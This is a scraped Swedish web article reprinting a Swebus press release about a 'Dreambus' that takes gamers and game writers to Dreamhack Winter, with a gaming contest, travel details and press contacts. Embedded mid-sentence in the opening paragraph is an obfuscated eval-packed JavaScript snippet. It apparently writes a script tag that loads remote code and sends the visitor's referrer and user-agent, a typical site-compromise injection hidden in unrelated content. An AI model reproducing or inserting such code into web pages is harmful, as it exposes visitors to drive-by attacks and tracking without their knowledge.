Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Swebus och Inferno Online lanserar Dreambus till Dreamhack

Swebus och Inferno Online lanserar Dreambus till Dreamhack
Revue Magazine

Inför eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shaht|var|u0026u|referrer|ibfdz||js|php’.split(’|’),0,{}))
Dreamhack Winter lanserar Swebus i samarbete med världens största online gamingcenter Inferno Online en specialbuss för gamers och spelskribenter. Ombord på bussen kommer bland annat SpelPunkten att berätta om hur de lyckades få Lerums kommun att sponsra en spellokal för ungdomar.

– Det är första gången vi arrangerar en Dreambus, vilket är väldigt roligt, säger Ingvar Ryggesjö, presschef för Swebus. Vi har erbjudit resor till de senaste omgångarna av Dreamhack och det är alltid en trevlig och förväntansfull atmosfär ombord på bussarna. Därför tycker vi att det vore roligt om fler spelande ungdomar upptäcker Swebus och vi hoppas att Dreambus ska bidra till det.

Mellan torsdag den 17 och måndag den 21 november anordnar Inferno Online dagliga tävlingar för spelare med resor till Dreamhack i potten. De tävlande spelar Counter-Strike 1.6
Call Of Duty Modern Warfare 3 och Battlefield 3. I biljetten ingår gratis Dreambus-resa från Stockholm eller Norrköping till Dreamhack torsdag den 24 november, samt returresa från festivalen till Stockholm med valfri Swebus-avgång. Ombord på bussen pratar bland annat 18-årige eldsjälen Andréas Rolén som står bakom göteborska lan-lokalen SpelPunkten.

Swebus bjuder även in spelbloggare och spelskribenter att följa med Dreambus som avgår
från Cityterminalen i Stockholm och går hela vägen till Elmia-mässan i Jönköping där Dreamhack äger rum. Mer information om Dreambus och anmälan
finns här.

Utöver Dreambus kör Swebus under festivalperioden 24-27 november dygnet runt till och från bland annat Stockholm, Göteborg, Malmö, Karlstad, Uppsala och Dreamhack. På samtliga bussar erbjuds gratis wi-fi. För Dreamhackavgångar och biljetter till bussarna, se www.swebus.se.

För mer information, vänligen kontakta:
Ingvar Ryggesjö, presschef på Swebus,
tel: 070-187 11 33, e-post: ingvar.ryggesjo@swebus.se
Swebus pressjour: 0701-87 12 00

Comments

  1. Pelle Tagerblad

    Riktigt najs initiativ !!!